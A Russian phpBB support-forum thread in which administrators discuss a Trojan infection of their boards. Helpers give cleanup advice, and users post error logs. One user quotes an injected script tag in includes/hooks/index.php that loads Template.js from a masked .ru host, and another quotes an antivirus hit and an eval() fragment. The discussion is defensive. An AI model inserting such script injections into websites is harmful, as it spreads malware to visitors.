Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 18 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
Leviafant
phpBB 1.4.4
Сообщения: 106
Стаж: 18 лет 3 месяца
Откуда: Курск

Re: Как убить Трояна?

Сообщение Leviafant »

MIT
боитесь признать наличие уязвимости?
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: Как убить Трояна?

Сообщение MIT »

Leviafant
Стало быть, есть какая-то веская причина, по которой из сотен тысяч или даже миллионов форумов phpBB был заражён только твой (и ещё парочка каких-нибудь). Можешь её озвучить?
Последний раз редактировалось MIT 07.08.2010 11:45, всего редактировалось 1 раз.
Аватара пользователя
Leviafant
phpBB 1.4.4
Сообщения: 106
Стаж: 18 лет 3 месяца
Откуда: Курск

Re: Как убить Трояна?

Сообщение Leviafant »

MIT
видимо уязвимость в старых версиях
Аватара пользователя
DK7
Former team member
Сообщения: 1008
Стаж: 18 лет 9 месяцев
Откуда: Кишинёв
Благодарил (а): 1 раз

Re: Как убить Трояна?

Сообщение DK7 »

У вас выделенный сервер?
Если нет то достаточно трояну бомбануть другой сайт находящийся рядом на хостинге, что бы потом заразить и ваши файлы.
все просто.

Добавлено спустя 23 секунды:
Leviafant писал(а):MIT
видимо уязвимость в старых версиях
ну взламывай тогда
http://www.google.md/search?q=phpbb+3.0 ... nt=firefox
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 20 лет 9 месяцев
Откуда: Бердск

Re: Как убить Трояна?

Сообщение crash »

Leviafant писал(а):я пользуюсь линуксом
и что?
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
spylook
phpBB 1.0.0
Сообщения: 6
Стаж: 14 лет 8 месяцев

появились ошибки - ничего не делал

Сообщение spylook »

Не отображаются фотки,
при входе пишет, что пользователь на форуме, но в натуре выбрасывает
Ошибки такие:
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 1007: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4284: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4286: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4287: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 4288: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
Помогите кто чем может...
Последний раз редактировалось spylook 15.08.2010 16:08, всего редактировалось 1 раз.
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 16947
Стаж: 18 лет 11 месяцев
Откуда: Красноярск
Благодарил (а): 549 раз
Поблагодарили: 1700 раз

Re: появились ошибки - ничего не делал

Сообщение rxu »

Никто по ссылке не ходите - там куча троянов.
spylook
Вам сюда Как убить Трояна?
Изображение
Аватара пользователя
владимир1983
phpBB 3.2.6
Сообщения: 5954
Стаж: 15 лет
Откуда: Сергиев Посад
Благодарил (а): 295 раз
Поблагодарили: 287 раз

Re: появились ошибки - ничего не делал

Сообщение владимир1983 »

rxu
Знать бы пораньше, вроде попал.
Вот на что ругнулся:

Код: Выделить всё

15.08.2010 15:27:06	Обнаружено: HEUR:Exploit.Script.Generic	Opera Internet Browser		http://***.ru:8080/jquery.jxx?v=5.3.4

Виндовс повис на минуту, белый экран, вот такое вылезло eval("Wn36rqe='R';"); и комп самостоятельно начал перезагружаться.
Сейчас сканером придётся смотреть что я там подцепил.
За ваши деньги решу ваши проблемы. Стучи в ЛС.
Нет человека - нет проблемы. (c)
spylook
phpBB 1.0.0
Сообщения: 6
Стаж: 14 лет 8 месяцев

Re: появились ошибки - ничего не делал

Сообщение spylook »

ссылку удалил. Спасибо за совет, буду читать, пробовать...
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: появились ошибки - ничего не делал

Сообщение MIT »

владимир1983 писал(а):и комп самостоятельно начал перезагружаться
+1 зомби у чьему-то ботнету
Аватара пользователя
DK7
Former team member
Сообщения: 1008
Стаж: 18 лет 9 месяцев
Откуда: Кишинёв
Благодарил (а): 1 раз

Re: появились ошибки - ничего не делал

Сообщение DK7 »

Переустановка системы спасет грешную душу)
Аватара пользователя
владимир1983
phpBB 3.2.6
Сообщения: 5954
Стаж: 15 лет
Откуда: Сергиев Посад
Благодарил (а): 295 раз
Поблагодарили: 287 раз

Re: появились ошибки - ничего не делал

Сообщение владимир1983 »

MIT
DK7
Не нагоняйте ужаса, и так боюсь!
За ваши деньги решу ваши проблемы. Стучи в ЛС.
Нет человека - нет проблемы. (c)
Аватара пользователя
MIT
Former team member
Сообщения: 2500
Стаж: 16 лет 1 месяц
Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
Поблагодарили: 26 раз

Re: появились ошибки - ничего не делал

Сообщение MIT »

DK7, вот уж не факт...
Аватара пользователя
DK7
Former team member
Сообщения: 1008
Стаж: 18 лет 9 месяцев
Откуда: Кишинёв
Благодарил (а): 1 раз

Re: появились ошибки - ничего не делал

Сообщение DK7 »

MIT писал(а):DK7, вот уж не факт...
да) иногда спасает только полное форматирование. Бывает что и винты люди меняли...)
spylook
phpBB 1.0.0
Сообщения: 6
Стаж: 14 лет 8 месяцев

Re: появились ошибки - ничего не делал

Сообщение spylook »

Вот чего нарыл:
по файлу /includes/session.php on line 1007

Код: Выделить всё

	header('Set-Cookie: ' . $name_data . (($cookietime) ? '; expires=' . $expire : '') . '; path=' . $config['cookie_path'] . $domain . ((!$config['cookie_secure']) ? '' : '; secure') . '; HttpOnly', false);
по файлу /includes/functions.php

Код: Выделить всё

4283    // application/xhtml+xml not used because of IE
4284	header('Content-type: text/html; charset=UTF-8');
4286	header('Cache-Control: private, no-cache="set-cookie"');
4287	header('Expires: 0');
4288	header('Pragma: no-cache');
По файлу /includes/hooks/index.php

Код: Выделить всё

Line 251      <script type="text/javascript" src="http://****.ru/Template.js"></script>
Я так понимаю, что надо просто заменить эти файлы на исходные.
Но,объясните, пожалуйста, что обозначают все эти строки?

Вернуться в «phpBB-пространство»